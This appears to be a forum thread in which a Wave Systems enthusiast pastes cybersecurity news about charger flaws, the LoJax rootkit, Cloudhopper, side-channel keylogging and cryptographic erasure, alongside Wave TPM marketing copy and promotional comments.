Particularly one provider exhibited problems the experts say, but they have since all been solved. While the press release does not state the name of the supplier, a paper detailing the analysis has ChargePoint’s Home charging station at the centre.
However, Kaspersky Labs warns in general, that while electric cars are being fire-walled regularly so to speak, charging stations, particularly those enabling remote operation are vulnerable to attacks.
For example, the researchers found a way to initiate commands on the charger and to either stop the charging processor or set it to the maximum current possible. While the first option would only prevent a person from using the electric car, the second one could potentially cause the wires to overheat on a device that is not protected by a trip fuse.
All an attacker needs to do to change the amount of electricity being transmitted is obtain Wi-Fi access to the network the charger is connected to. Since the devices are made for home use, security for the wireless network is likely to be limited. This means that attackers could gain access easily, for example by bruteforcing all possible password options, which is quite common: according to Kaspersky Lab statistics 94% of attacks on IoT in 2018 used this method. Once inside the home network, the intruders can easily find the charger’s IP-address and then exploit any vulnerabilities.
For home users, Kaspersky Labs recommend to regularly update all smart devices to the latest software versions. Moreover, using strong passwords but also isolating the smart home network from the network used by the personal devices for basic Internet searching is advisable.
Meanwhile, experts at Fraunfofer SIT have been looking into similar issues, however concentrating on public devices. Like Kaspersky, Fraunhofer SIT also assumes that charging stations are an easy target for IT-based attacks. Yet, in this case, hackers could manipulate the charging stations to charge for free indefinitely or to capture personal data for example.
To prevent such attacks, they modelled a solution that was recently presented at a conference in Berlin and is called the Trusted Platform Module. The hardware connects to the charging station permanently and enables to check remotely whether the charging station firmware remains in perfect condition.
The Fraunhofer solution was developed as part of the DELTA project (data security and integrity in electric mobility) that looks at charging and billing in compliance with legal metrology (Eichrecht).
=================================================================
If the TPM is used in checking firmware integrity, shouldn't this application be phenomenally impacting TPMs across the globle?! Shouldn't all TPMs be enabled by now?! Wave could help with turning on TPMs by using ERAS and Wave ESC could manage the TPM.
=================================================================
ERAS can turn on TPMs in large numbers.
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Excerpt:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
First-Ever UEFI Rootkit Tied to Sednit APT
https://threatpost.com/uefi-rootkit-sednit/140420/
Researcher at ESET outlines research on the first successful UEFI rootkit used in the wild.
LEIPZIG, GERMANY – Researchers hunting cyber-espionage group Sednit (an APT also known as Sofacy, Fancy Bear and APT28) say they have discovered the first-ever instance of a rootkit targeting the Windows Unified Extensible Firmware Interface (UEFI) in successful attacks.
The discussion of Sednit was part of the 35C3 conference, and a session given by Frédéric Vachon, a malware researcher at ESET who published a technical write-up on his findings earlier this fall (PDF). During his session, Vachon said that finding a rootkit targeting a system’s UEFI is significant, given that rootkit malware programs can survive on the motherboard’s flash memory, giving it both persistence and stealth.
“UEFI rootkits have been researched and discussed heavily in the past few years, but sparse evidence has been presented of real campaigns actively trying to compromise systems at this level,” he said.
The rootkit is named LoJax. The name is a nod to the underlying code, which is a modified version of Absolute Software’s LoJack recovery software for laptops. The purpose of the legitimate LoJack software is to help victims of a stolen laptop be able to access their PC without tipping off the bad guys who stole it. It hides on a system’s UEFI and stealthily beacons its whereabouts back to the owner for possible physical recovery of the laptop.
Each time the system restarts, the code executes on boot, before the OS loads and before the system’s antivirus software is launched. That means that even if the device’s hard drive is replaced, the LoJack software will still operate.
According to Vachon, the bad guys are making good use of this with LoJax. This weaponized, customized version of Absolute Software’s wares dates back to a vulnerable 2009 version, which had several key bugs, chief among them a configuration module that was poorly secured with weak encryption.
“This vulnerability allowed Sednit to customize a single byte that contains the domain information for the legitimate software to connect to in order to download the recovery software,” he said. In the case of LoJax, the single byte contained Sednit command-and-control domains that ultimately delivered the rootkit payload.
The infection chain is typical: An attack begins with a phishing email or equivalent, successfully tricking a victim into downloading and executing a small rpcnetp.exe dropper agent. The rpcnetp.exe installs and reaches out to the system’s Internet Explorer browser, which is used to communicate with the configured domains.
“Once I have a foothold on the machine I can use this tool to deploy the UEFI rootkit,” Vachon explained, adding that the hacker tool takes advantage firmware vendors allowing remote flashing. “UEFI rootkit is located in the BIOS region of the serial peripheral interface (SPI) flash memory,” he said.
Once the UEFI rootkit is installed, there’s not much a user can do to remove it besides re-flashing the SPI memory or throwing out the motherboard, Vachon said.
In May, Arbor Networks spotted LoJack being reused by Sednit agents to develop LoJax. But it wasn’t until September that Sednit began to use it in live campaigns, observed by ESET. These are targeting mostly government entities located in the Balkans, as well as Central and Eastern Europe.
ESET said it identified a customer who had been infected by the rogue version of the LoJax. And last month, the Pentagon made a good-faith gesture to be more open and started uploading malware samples from APTs and other nation-state sources to the website VirusTotal. The first two samples were rpcnetp.dll and rpcnetp.exe, which are both detected as dropper mechanisms for the UEFI rootkit.
By enabling Windows Secure Boot, and making sure their UEFI firmware is up to date, end users can protect themselves against attack, Vachon said.
==================================================================
It would make sense that after secure boot and the TPM is enabled in Windows 8.1 that Windows 7 should have their TPMs activated as well. With Windows 10 TPMs being enabled as well, Wave ERAS could have helped in activating a full fleet (Windows 7, 8, 8.1 and 10) of computer TPMs in a company such that they are able to keep unknown devices off the company/organization's network. In short, organizations only having TPMs activated on Windows 8.1 (rather than the full range of OSes: 7, 8, 8.1, and 10) could be missing out on better cybersecurity. Organizations having Wave VSC 2.0 and Wave Endpoint Monitor also would enhance their cybersecurity posture. imo.
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-endpoint-monitor
How to Use Multi-Factor Authentication When You Don't Have Cell Phone Access
https://www.business2community.com/cybersecurity/how-to-use-multi-factor-authentication-when-you-dont-have-cell-phone-access-02153446
4 benefits that Wave VSC 2.0 has over what is in this article:
1. No phone needed for SMS and Wave VSC 2.0 doesn't present a problem when the cell phone has no access.
2. Simpler to set up and use. imo.
3. No token needed (or to lose) because the TPM provides the second factor of authentication.
4. 'Sometimes you will have to go through the full recovery process for each account you've secured using a third party provider.' Wave VSC 2.0 recovery process is simpler and more effective. imo.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
*Actual number may vary. Contact us today to receive more details and a free quote.
Key Features:
Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases ? Virtual Private Network (VPN)
? Local logon
? Remote logon
? Remote desktop access
? Intranet/Extranet
? Cloud applications
Cyberwar predictions for 2019: The stakes have been raised
https://www.zdnet.com/article/cyberwar-predictions-for-2019-the-stakes-have-been-raised/
Cybersecurity will define many of the international conflicts of the future. Here's an overview of the current threat landscape, UK and US policy in this area, and some expert predictions for the coming year.
Before the internet era, geopolitical tensions drove traditional espionage, and periodically erupted into warfare. Nowadays, cyberspace not only houses a treasure-trove of commercially and politically sensitive information, but can also provide access to control systems for critical civil and military infrastructure. So it's no surprise to find nation-state cyber activity high on the agendas of governments.
Notable cyber attacks launched by nation states in recent years include: Stuxnet (allegedly by Israel and the US); DDoS attacks against Estonia, attacks against industrial control systems for power grids in Ukraine, and electoral meddling in the US (allegedly by Russia); and the global WannaCry attack (allegedly by North Korea). China, meanwhile, has been accused of multiple intellectual property theft attacks and, most recently (and controversially), of secreting hardware backdoors into Supermicro servers.
The global cyber-threat landscape
What does the current threat landscape look like, in broad terms? The 2017/18 threat matrix from BRI (Business Risk Intelligence) company Flashpoint provides a useful overview:
Threat actors are ranked on a six-point capability scale and a four-point potential impact scale, with Flashpoint's cast ranging from Tier 2 capability/Negligible potential impact (Jihadi hackers) to Tier 6/Catastrophic impact (China, Russia and Five Eyes).
It's probably no surprise to find China heading the 2017/18 ranking of threat actors, in terms of capability, potential impact and number of verticals targeted:
In its 2018 mid-year update, Flashpoint highlighted various 'bellwethers' that may prompt "major shifts in the cyber threat environment":
• The tentative rapprochement between the U.S., South Korea, and North Korea fails to result in tangible diplomatic gains to end the North Korean nuclear program.
• Additional states follow the U.S. example and relocate their embassy in Israel to Jerusalem.
• The U.S.' official withdrawal from the Joint Comprehensive Plan of Action (JCPOA) and the subsequent renewal of economic sanctions prompts an Iranian response.
• The ongoing power struggle between Saudi Arabia and Iran for influence in the Middle East leads to kinetic conflict in the region.
• U.S. and European Union-led economic sanctions in place on Russia are extended or tightened.
• The Trump administration adopts a less-compromising approach toward U.S.-China relations or otherwise enacts policies that threaten Chinese core interests. Alternatively, China adopts an increasingly aggressive policy toward securing its vital core interests, including the South China Sea and the questions of Taiwan's and Hong Kong's political sovereignty.
• The situation in Syria further deteriorates into direct armed conflict between major states with differing interests in the region, potentially extending further into neighboring states.
• Other nation-states, such as China, Iran, and North Korea adopt the Russian model of engaging in cyber influence operations via proxies, resulting in the exposure of such a campaign.
Cybersecurity policy in the UK
In the UK, the National Cyber Security Center (NCSC) -- an amalgam of CESG (the information security arm of GCHQ), the Centre for Cyber Assessment, CERT-UK, and the Centre for Protection of National Infrastructure -- issues periodic security advisories, among other services. In April, for example, it warned of hostile state actors compromising UK organisations with focus on engineering and industrial control companies. Specifically, the threats involved "the harvesting of NTLM credentials via Server Message Block (SMB) using strategic web compromises and spear-phishing". Other recent NCSC advisories have highlighted Russian state-sponsored cyber actors targeting network infrastructure devices and the activities of APT28 (a.k.a. the cyber espionage group Fancy Bear).
In its 2018 annual review, the NCSC said it had dealt with over a thousand cyber incidents since its inception in 2016. "The majority of these incidents were, we believe, perpetrated from within nation states in some way hostile to the UK. They were undertaken by groups of computer hackers directed, sponsored or tolerated by the governments of those countries," said Ciaran Martin, CEO at NCSC, in the report. "These groups constitute the most acute and direct cyber threat to our national security. I remain in little doubt we will be tested to the full, as a centre, and as a nation, by a major incident at some point in the years ahead, what we would call a Category 1 attack."
A Category 1 attack constitutes a 'national cyber emergency' and results in "sustained disruption of UK essential services or affects UK national security, leading to severe economic or social consequences or to loss of life."
Despite the efforts of the NCSC, a recent report by the UK parliament's Joint Committee on the National Security Strategy noted that "The threat to the UK and its critical national infrastructure [CNI] is both growing and evolving. States such as Russia are branching out from cyber-enabled espionage and theft of intellectual property to preparing for disruptive attacks, such as those which affected Ukraine's energy grid in 2015 and 2016."
The government needs to do more to change the culture of CNI operators and their extended supply chains, the report said, adding that: "This is also a lesson for the Government itself: cyber risk must be properly managed at the highest levels."
Specifically, the Joint Committee report recommended an improvement in political leadership: "There is little evidence to suggest a 'controlling mind' at the centre of government, driving change consistently across the many departments and CNI sectors involved. Unless this is addressed, the government's efforts will likely remain long on aspiration and short on delivery. We therefore urge the government to appoint a single Cabinet Office minister who is charged with delivering improved cyber resilience across the UK's critical national infrastructure."
Cybersecurity policy in the US
In the US, the September 2018 National Cyber Strategy (the first in 15 years, according to the White House) adopted an aggressive stance, promising to "deter and if necessary punish those who use cyber tools for malicious purposes." The Trump administration is in no doubt about who the US is up against in the cyber sphere:
"The Administration recognizes that the United States is engaged in a continuous competition against strategic adversaries, rogue states, and terrorist and criminal networks. Russia, China, Iran, and North Korea all use cyberspace as a means to challenge the United States, its allies, and partners, often with a recklessness they would never consider in other domains. These adversaries use cyber tools to undermine our economy and democracy, steal our intellectual property, and sow discord in our democratic processes. We are vulnerable to peacetime cyber attacks against critical infrastructure, and the risk is growing that these countries will conduct cyber attacks against the United States during a crisis short of war. These adversaries are continually developing new and more effective cyber weapons."
The US cyber security strategy is built around four tenets: Protect the American People, the Homeland and the American Way of Life; Promote American Prosperity; Preserve Peace through Strength; and Advance American Influence.
As far as preserving 'peace through strength' is concerned, the Trump administration states that: "Cyberspace will no longer be treated as a separate category of policy or activity disjointed from other elements of national power. The United States will integrate the employment of cyber options across every element of national power." The objective is to "Identify, counter, disrupt, degrade, and deter behavior in cyberspace that is destabilizing and contrary to national interests, while preserving United States overmatch in and through cyberspace."
It would seem that the stakes in the cybersecurity/cyberwar game have just been raised by the world's most powerful nation.
2019 nation-state / cyberwar predictions
Nation-state activity has been prominent in previous annual roundups of cybersecurity predictions (2018, 2017, 2016), and given the above overview we expect plenty more in 2019. Let's examine some of the predictions in this area that have been issued so far.
see link for more including comments by Fireye.
Outlook
It's clear from the above round-up of predictions that nation states are likely to be more active than ever in cyberspace in 2019. Perhaps we'll even see the sort of 'national cyber emergency' envisaged by the UK's NCSC, with potential loss of life. That's the point where cyber attack moves towards cyberwar.
It's also clear that governments -- in the UK and US at least -- are increasingly, if belatedly, acknowledging the scale of the problem of hostile nation-state cyber activity. It remains to be seen how effectively they can defend themselves, and even retaliate.
=================================================================
After reading Fireye's points in this article it seems crazy that the U.S. and/or other countries are not using the Wave Alternative within their computer infrastructure. The TPM is ubiquitous now and available in 100% of most companies computer fleets (therefore can give entrance to only known computers on the network). The Wave Alternative could be so beneficial to the U.S. and other countries. The other alternatives are not working very well.
=================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
Merry Christmas and Happy Holidays!
China hacked HPE and IBM, and then attacked their clients: Sources
https://www.cnbc.com/2018/12/21/china-hacked-hpe-and-ibm-and-then-attacked-their-clients-sources-.html
•Hackers working on behalf of China's Ministry of State Security breached the networks of Hewlett Packard Enterprise Co and IBM.
•The hackers then used the access to hack into their clients' computers, according to five sources familiar with the attacks.
•The attacks were part of a Chinese campaign known as Cloudhopper, which the U.S. and Britain said infected technology service providers in order to steal secrets from their clients.
Hackers working on behalf of China's Ministry of State Security breached the networks of Hewlett Packard Enterprise Co and IBM, then used the access to hack into their clients' computers, according to five sources familiar with the attacks.
The attacks were part of a Chinese campaign known as Cloudhopper, which the United States and Britain on Thursday said infected technology service providers in order to steal secrets from their clients.
While cybersecurity firms and government agencies have issued multiple warnings about the Cloudhopper threat since 2017, they have not disclosed the identity of technology companies whose networks were compromised.
International Business Machines Corp said it had no evidence that sensitive corporate data had been compromised. Hewlett Packard Enterprise (HPE) said it could not comment on the Cloudhopper campaign.
Businesses and governments are increasingly looking to technology companies known as managed service providers (MSPs) to remotely manage their information technology operations, including servers, storage, networking and help-desk support.
Cloudhopper targeted MSPs to access client networks and steal corporate secrets from companies around the globe, according to a U.S. federal indictment of two Chinese nationals unsealed on Thursday. Prosecutors did not identify any of the MSPs that were breached.
Both IBM and HPE declined to comment on the specific claims made by the sources.
"IBM has been aware of the reported attacks and already has taken extensive counter-measures worldwide as part of our continuous efforts to protect the company and our clients against constantly evolving threats," the company said in a statement. "We take responsible stewardship of client data very seriously, and have no evidence that sensitive IBM or client data has been compromised by this threat."
HPE said in a statement that it had spun out a large managed-services business in a 2017 merger with Computer Sciences Corp that formed a new company, DXC Technology.
The security of HPE customer data is our top priority," HPE said. "We are unable to comment on the specific details described in the indictment, but HPEs managed services provider business moved to DXC Technology in connection with HPEs divestiture of its Enterprise Services business in 2017.
DXC Technology declined to comment, saying in a statement that it does not comment on reports about specific cyber events and hacking groups.
Reuters was unable to confirm the names of other breached technology firms or identify any affected clients.
The sources, who were not authorized to comment on confidential information gleaned from investigations into the hacks, said that HPE and IBM were not the only prominent technology companies whose networks had been compromised by Cloudhopper.
Cloudhopper, which has been targeting technology services providers for several years, infiltrated the networks of HPE and IBM multiple times in breaches that lasted for weeks and months, according to another of the sources with knowledge of the matter.
IBM investigated an attack as recently as this summer, and HPE conducted a large breach investigation in early 2017, the source said.
The attackers were persistent, making it difficult to ensure that networks were safe, said another source.
IBM has dealt with some infections by installing new hard drives and fresh operating systems on infected computers, said the person familiar with the effort.
Cloudhopper attacks date back to at least 2014, according the indictment.
The indictment cited one case in which Cloudhopper compromised data of an MSP in New York state and clients in 12 countries including Brazil, Germany, India, Japan, the United Arab Emirates, Britain and the United States. They were from industries including finance, electronics, medical equipment, biotechnology, automotive, mining, and oil and gas exploration.
One senior intelligence official, who declined to name any victims who were breached, said attacks on MSPs were a significant threat because they essentially turned technology
companies into launchpads for hacks on clients.
"By gaining access to an MSP, you can in many cases gain access to any one of their customers," said the official. "Call it the Walmart approach: If I needed to get 30 different items for my shopping list, I could go to 15 different stores or I could go to the one that has everything.
Representatives with the FBI and Department of Homeland Security declined to comment. Officials with the U.S. Justice Department and the Chinese embassy in Washington could not be reached.
A British government spokeswoman declined to comment on the identities of companies affected by the Cloudhopper campaign or the impact of those breaches.
A number of MSPs have been affected, and naming them would have potential commercial consequences for them, putting them at an unfair disadvantage to their competitors," she said.
=================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department
What to do if you cannot load the management console
https://windowsreport.com/management-console-not-loading/#.XB-sFE2pUiQ
Trying to run the Trusted Platform Module (TPM) Management console in Windows 10 can often lead to the Cannot load management console error. This again happens when you have either disabled or cleared TPM right in the BIOS itself. This is applicable to Windows 10 devices, version 1703 or version 1809.
Trusted Platform Module, for those not in the knowing, is a dedicated piece of hardware entrusted with providing a secure environment for the storage of data of critical importance. Those can be encryption keys, signatures and so on. That makes it extremely important to make any changes with TPM with utmost care so as not to compromise the security of your PC.
However, fixing the above error is rather easy and can be done quickly enough.
Steps to fix management console loading issues
Since there are two ways the error is generated – disabled or cleared in BIOS – the solution too involves two distinct methods that have been discussed below.
Case 1: When TPM has been cleared in BIOS
If you know the TPM has been cleared in the BIOS, all that you have to do is close the TPM Management console and then start it again.
Case 2: When TPM has been disabled in BIOS:
In this case, you will have to re-enable it in BIOS. Here are the steps:
•Reboot your PC and enter BIOS. This is usually done by pressing F2 repeatedly when the computer is booting. The hotkey though might differ for different brand of PCs.
•Look for the Security option on the left.
•Expand the Security option to reveal the TPM
•Select the TPM Security check box to view the TPM settings
•You will get to see the Deactivate and Activate radio buttons. Click on Activate to make TPM active.
The other option for you to do will be to run a specific Windows PowerShell command. Point to note here is that you will need administrator privileges to run the command. Here are the steps to follow:
1.Open Windows PowerShell. You can do this by right clicking on start and selecting Windows PowerShell (Admin). You can also type Windows PowerShell in the Cortana search box and press enter. Right click on the app and select Run as administrator.
2.Type the following commands and press enter:?$tpm = gwmi -n rootcimv2securitymicrosofttpm win32_tpm
?$tpm.SetPhysicalPresenceRequest(6)
Restart you PC and consent to any BIOS prompts that comes your way.
That’s it. The Cannot load management console error shouldn’t be bothering you anymore. Microsoft has also stated they are further investigating the issue and will let us know if they come across something more interesting or useful.
==================================================================
Wouldn't it be cool if ERAS could automatically fix this manual problem in Windows 10 especially in a companies' fleet of computers: Have ERAS just set all the TPMs to active. It could save many users from doing this manual work and get all the TPMs active in the company network. imo. Active TPMs then could provide for known devices on the network and keep the bad guys(unknown devices) out. The TPM could then also be used for Wave Endpoint Monitor and Wave VSC 2.0!
New attack intercepts keystrokes via graphics libraries
https://www.zdnet.com/article/new-attack-intercepts-keystrokes-via-graphics-libraries/
Attack can guess text input from both hardware and on-screen keyboards alike.
A team of academics says they can determine user key presses by watching for data leaks in how a processor computes code from standard graphics libraries.
The general idea behind this research is that the code that renders text on screen via the standard graphics libraries included in modern operating systems leaks clues about the information it is processing, even if the text is hidden behind a password's generic dots.
This type of vulnerability --known as a side-channel attack-- isn't new, but it's been primarily utilized for recovering cleartext information from encrypted communications.
However, this new side-channel attack variation focuses on the CPU shared memory where graphics libraries handle rendering the operating system user interface (UI).
In a research paper shared with ZDNet and that will be presented at a tech conference next year, a team of academics has put together a proof-of-concept side-channel attack aimed at graphics libraries.
They say that through a malicious process running on the OS they can observe these leaks and guess with high accuracy what text a user might be typing.
Sure, some readers might point out that keyloggers (a type of malware) can do the same thing, but the researcher's code has the advantage that it doesn't require admin/root or other special privileges to work.
The attack code can be hidden inside legitimate apps and recover keystrokes with a much lower chance of getting detected by antivirus products.
But the researchers' attack isn't something to worry about just yet. This attack is only theoretical, for now, and would be very hard to pull off by a low-skilled attacker.
Preparing a side-channel attack of this type requires studying how an operating system interacts with its graphics library on specific hardware architectures. An attacker would need to have precise hardware specs of a victim's computer, but also of the software the target uses, from where it intends to steal text (most likely login passwords).
But there are also advantages for this attack. For starters, compared to classic keylogging malware, this attack also works with on-screen keyboards and is not solely limited to collecting key presses from hardware keyboards.
Furthermore, the attack can be tailored to work on any OS, including mobile operating systems. During their tests, researchers captured keystrokes from an Ubuntu and Android OS
In addition, as the attack collects more key presses from graphics libraries, it also gets better at guessing the correct key presses.
The proof-of-concept attack researchers devised for their paper was coded to intercept only numerical and lowercase characters, but researchers say that an attacker can switch to a different prediction model to take into account uppercase letters and special characters if needed.
The research team has also recorded a demo of their attack, embedded below. They also plan to release the source code of their attack in the future.
More details about this attack will be available next year in a research paper entitled "Unveiling your keystrokes: A Cache-based Side-channel Attack on Graphics Libraries," authored by academics from the University of California, Riverside, Virginia Tech, and the US Army Research Lab.
The research team is scheduled to present their work at the Network and Distributed System Security Symposium (NDSS) that will take place in San Diego in late February 2019.
==================================================================
What would happen if a RSA Securid user lost their Securid? (and that is easy to do; see link below) The fill in for the lost Securid token would be very susceptible to this new attack along with the password. One compromised token and password could result in security failure for a company network. Wave VSC 2.0 - better security at less than half the cost.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
Cryptographic Erasure: Moving Beyond Hard Drive Destruction
https://www.darkreading.com/endpoint/cryptographic-erasure-moving-beyond-hard-drive-destruction/a/d-id/1333492
In the good old days, incinerating backup tapes or shredding a few hard drives would have solved the problem. Today, we have a bigger challenge.
Over the last decade we meticulously taught ourselves how to collect, store, and process big data. Now, the next challenge is to get rid of this data.
The General Data Protection Regulation (GDPR), with its sweeping mandates for protecting personal data, was a wake-up call for businesses across the board that they needed to exercise greater control over many aspects of their data processing practices. The California Consumer Privacy Act followed suit, and there is a high probability that other upcoming privacy laws around the world will likely continue the trend.
Regulations around how data is used, data retention time frames, and data subjects' right to be forgotten all necessitate particular attention to data destruction. In the good old days, incinerating backup tapes or shredding a few hard drives would have solved the problem. Today, we have a bigger challenge on our hands.
We now work with complex, massively distributed computing environments. The resources we directly control are often spread across the globe, and the rest live in some external organization's opaque cloud. System components interact in complex (and sometimes unexpected) ways, forming both explicit and implicit data flows between them. The challenge is to track down where exactly data is before we can even start thinking about how to destroy it.
Cryptographic Erasure
Cryptographic erasure roughly means encrypting the data first, and when it is time to delete it, discarding the encryption key instead. Under computational assumptions that the underlying cryptographic primitives cannot be broken (and we can all agree that cryptography is the strongest link in a secure system), without the key, that data could never be decrypted again. It is as good as deleted.
Many readers will be familiar with the term from the recent NIST and ISO guidelines that recommend it as a secure data destruction technique. Storage media vendors have also been promoting cryptographic erasure as a faster alternative to traditional data destruction mechanisms. For example, self-encrypting drives in the market can refresh the key stored in their onboard controller, instantaneously rendering the contents unreadable.
In reality, however, this idea dates all the way back to 1996, first publicly proposed by Dan Boneh and Richard Lipton. In their paper titled "A Revocable Backup System," published in the USENIX Security Symposium, the authors describe a tape backup scheme in which backed-up data is encrypted with a periodically refreshed key. Every time the key changes, old backups are lost without requiring any modifications to the tape itself, analogous to modern self-encrypting drives.
